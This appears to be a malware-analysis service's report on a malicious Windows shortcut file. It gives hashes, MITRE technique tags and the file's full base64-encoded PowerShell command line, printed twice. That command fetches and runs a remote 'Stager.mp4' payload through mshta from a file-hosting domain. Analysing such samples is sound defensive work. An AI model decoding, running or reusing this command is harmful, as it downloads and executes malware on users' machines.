Malicious
Malicious

0906e26681d7866715a52648581d03bd

LNK File
|
MD5: 0906e26681d7866715a52648581d03bd
|
Size: 2.38 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules2
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
0906e26681d7866715a52648581d03bd
Sha1
c2f5371932deca1e5b939f8dba109884da2c7131
Sha256
de36a43adddc063311313a12aa800d63af9df0e5e7379c1a2b16aee92d4e5c66
Sha384
983f349d2c21295838eaca64ab379c21f141faef9fc3b0d2e8413b89577d64e1e06cc031c85ac81baef71e70add8279b
Sha512
146a72d44cd3c1f26cdf5cf2499703c6d59e414032bbaafabdaf882bda4d05f7585bbe4b10c9126f5f99db9854b01d58b11d8f679016619db881e25948fd42f3
SSDeep
48:8r5aqzfSwuolMol3a/aklkQVh6FtmA4a:8r5vPa/vKQVMeA4
TLSH
1841642809F611FEF93787B99BF873F34562F7E28C285ABC108067424366050B4A3E79
File Structure
0906e26681d7866715a52648581d03bd
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AXgBtAF4AXgBeAHMAaABeAF4AdABhACAAaABeAF4AdAB0AHAAXgBeAHMAXgBeADoAXgBeAF4ALwBeAF4AXgBeAC8AYwBvAGwAXgBkAF4ALQBlAHUALQBeAF4AXgBeAGEAXgBnAF4AXgBsAC0AXgBeAF4AMQBeAF4AXgBeAC4AXgBeAF4AZwBeAF4AXgBeAG8AZgBeAF4AXgBpAF4AXgBsAGUAXgBeAC4AXgBeAF4AXgBpAF4AXgBeAG8AXgBeAC8AXgBeAF4AXgBkAF4AbwB3AG4AXgBeAF4AbABvAF4AXgBeAGEAZAAvAF4AZABeAF4AaQByAGUAYwBeAF4AXgBeAHQALwBeADgAXgA4ADQANwBeAF4AXgBjADEANABeAF4AMwBeAF4AXgAtAF4AYwBeAF4AXgAwAF4AXgBhAF4AXgBeAF4AMQAtADQAXgA1AF4AXgBeAGQAMAAtADgAXgBkAF4AZQAzAF4AXgBeAC0AZQBeAF4AXgBeAGYAMQBeAF4AXgBeAGIAOAA5ADcAXgBeADcAOQAyAGUAZQAvAF4AXgBTAF4AXgB0AGEAXgBeAGcAZQBeAF4AXgByAC4AbQBeAHAAXgA0ACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA==
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AXgBtAF4AXgBeAHMAaABeAF4AdABhACAAaABeAF4AdAB0AHAAXgBeAHMAXgBeADoAXgBeAF4ALwBeAF4AXgBeAC8AYwBvAGwAXgBkAF4ALQBlAHUALQBeAF4AXgBeAGEAXgBnAF4AXgBsAC0AXgBeAF4AMQBeAF4AXgBeAC4AXgBeAF4AZwBeAF4AXgBeAG8AZgBeAF4AXgBpAF4AXgBsAGUAXgBeAC4AXgBeAF4AXgBpAF4AXgBeAG8AXgBeAC8AXgBeAF4AXgBkAF4AbwB3AG4AXgBeAF4AbABvAF4AXgBeAGEAZAAvAF4AZABeAF4AaQByAGUAYwBeAF4AXgBeAHQALwBeADgAXgA4ADQANwBeAF4AXgBjADEANABeAF4AMwBeAF4AXgAtAF4AYwBeAF4AXgAwAF4AXgBhAF4AXgBeAF4AMQAtADQAXgA1AF4AXgBeAGQAMAAtADgAXgBkAF4AZQAzAF4AXgBeAC0AZQBeAF4AXgBeAGYAMQBeAF4AXgBeAGIAOAA5ADcAXgBeADcAOQAyAGUAZQAvAF4AXgBTAF4AXgB0AGEAXgBeAGcAZQBeAF4AXgByAC4AbQBeAHAAXgA0ACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA=="
0906e26681d7866715a52648581d03bd (2.38 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙